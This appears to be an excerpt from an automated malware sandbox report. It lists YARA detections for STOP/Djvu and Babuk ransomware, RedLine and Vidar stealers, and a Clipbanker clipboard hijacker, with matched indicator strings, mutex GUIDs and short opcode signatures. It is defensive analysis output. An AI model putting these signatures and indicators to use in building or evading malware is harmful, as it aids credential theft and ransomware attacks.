00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000004.00000002.2332971120.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000004.00000002.2332971120.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000004.00000002.2332971120.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000019.00000002.2212389849.0000000000960000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x708c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001F.00000002.3442731774.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000001F.00000002.3442731774.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000001F.00000002.3442731774.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000008.00000002.2351838122.0000000000558000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1724733752.0000000005E10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000005.00000002.1724733752.0000000005E10000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000020.00000002.4018244019.00000000008C0000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7784:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000C.00000002.1939543424.000000000081D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x756c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000A.00000002.1863815336.0000000005E10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000A.00000002.1863815336.0000000005E10000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000014.00000002.4155293453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
00000014.00000002.4155293453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000014.00000002.4155293453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000017.00000002.2097220953.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000017.00000002.2097220953.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000018.00000002.2108951598.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000018.00000002.2108951598.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000018.00000002.2108951598.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000017.00000002.2096966521.000000000449B000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.2351838122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000019.00000002.2211706428.0000000000850000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
00000019.00000002.2211706428.0000000000850000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000019.00000002.2211706428.0000000000850000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
0000001D.00000002.2792359253.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000001D.00000002.2792359253.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000001D.00000002.2792359253.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000005.00000002.1724605864.00000000043FD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000013.00000002.2042545624.0000000000970000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
00000013.00000002.2042545624.0000000000970000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000013.00000002.2042545624.0000000000970000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000000.00000002.1692193244.000000000459C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000020.00000002.4018136465.0000000000890000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
00000020.00000002.4018136465.0000000000890000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000020.00000002.4018136465.0000000000890000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000003.00000002.1714774399.000000000443C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1692488180.0000000005E30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000000.00000002.1692488180.0000000005E30000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000C.00000002.1939815597.0000000002320000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000000C.00000002.1939815597.0000000002320000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000000C.00000002.1939815597.0000000002320000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
0000000B.00000002.1878433305.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000B.00000002.1878433305.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000B.00000002.1878433305.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000007.00000002.1803095933.0000000001CAE000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1168:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Process Memory Space: mJVVW85CnW.exe PID: 6932	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: mJVVW85CnW.exe PID: 6932	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x403ea:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: mJVVW85CnW.exe PID: 6984	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: mJVVW85CnW.exe PID: 6984	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3125f:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: mJVVW85CnW.exe PID: 6288	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: mJVVW85CnW.exe PID: 6288	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x33a28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: mJVVW85CnW.exe PID: 1516	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: mJVVW85CnW.exe PID: 1516	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: mJVVW85CnW.exe PID: 1516	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x7b7ef8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: mJVVW85CnW.exe PID: 7152	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: mJVVW85CnW.exe PID: 7152	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3c557:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: mJVVW85CnW.exe PID: 6696	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: mJVVW85CnW.exe PID: 6696	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: mJVVW85CnW.exe PID: 6696	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3d598:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: build2.exe PID: 6264	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: build2.exe PID: 7036	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: build2.exe PID: 7036	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: build2.exe PID: 7036	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 91 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
32.2.mstsca.exe.8915a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
32.2.mstsca.exe.8915a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
25.2.mstsca.exe.8515a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
25.2.mstsca.exe.8515a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
25.2.mstsca.exe.8515a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
19.2.mstsca.exe.9715a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
19.2.mstsca.exe.9715a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
26.2.mstsca.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
